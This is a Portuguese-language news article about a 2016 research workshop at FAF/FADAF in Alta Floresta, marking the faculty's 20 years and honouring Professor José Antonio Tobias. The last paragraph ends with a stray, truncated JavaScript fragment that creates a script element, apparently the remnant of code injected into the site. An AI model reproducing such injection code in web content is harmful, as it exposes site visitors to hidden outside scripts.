Capa / Cultura / Professor Tobias recebe homenagem pelos 20 anos da FAF/FADAF em evento da instituição

Professor Tobias recebe homenagem pelos 20 anos da FAF/FADAF em evento da instituição

DSCN0915Prof. Sidney da Silva Chaves – Departamento de Comunicação da FAF/FADAF

Nos dias 26 e 27 de julho de 2016 ocorreu o IV Workshop do Núcleo de Estudos, Pesquisa e Extensão (NEPE) da Faculdade de Alta Floresta (FAF) e da Faculdade de Direito de Alta Floresta (FADAF). Durante o evento, houve palestras, mesas redondas e oficinas. Participaram acadêmicos, docentes, egressos da FAF/FADAF e comunidade em geral.

A coordenadora do NEPE Marilaine de Castro Pereira Marques, mestre em Educação, disse que o IV Workshop teve por finalidade oportunizar espaços de discussão e socialização de saberes, visando fortalecer a cultura da pesquisa e o aprimoramento da formação acadêmica profissional na FAF/FADAF, bem como, comemorar os 20 anos da Faculdade de Alta Floresta no Norte de Mato Grosso.

Dentre os que trabalharam em prol da realização do IV Workshop, muitos são egressos e acadêmicos da FAF/FADAF. Entre eles, estão os que fizeram as apresentações culturais na abertura do evento, o profissional que conduziu a solenidade, os que fizeram a mesa redonda e realizaram oficinas. “Mostrar o valor das pratas da casa foi uma maneira grandiosa de comemorar os 20 anos da FAF na região, apontou a Coordenadora.

Outro momento histórico,foi a homenagem ao Professor Dr. José Antonio Tobias, proprietário e Diretor das Instituições FAF/FADAF, o qual foi parabenizado por todos os presentes e homenageado pela coordenadoria do NEPE, devido à contribuição prestada para a sociedade local e regional.

Marilaine de Castro avaliou “obtivemos ótimos resultados no IV Workshop pelos seguintes motivos: os assuntos tratados foram pertinentes a todos os cursos da FAF/FADAF; os palestrantes cumpriram com êxito o papel atribuído aos mesmos; os acadêmicos e egressos que falaram de suas experiências acadêmicas e profissionais, destacaram a importância das proposições das faculdades que fizeram (FAF/FADAF), do empenho e investimento constantes de cada um na própria formação, evidenciando também que a pesquisa foi fundamental nesse processo.”

A Coordenadora agradeceu às pessoas que contribuíram para a realização do IV Workshop e ressaltou que o sucesso do evento deveu-se ao trabalho sério de todos os envolvidos.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top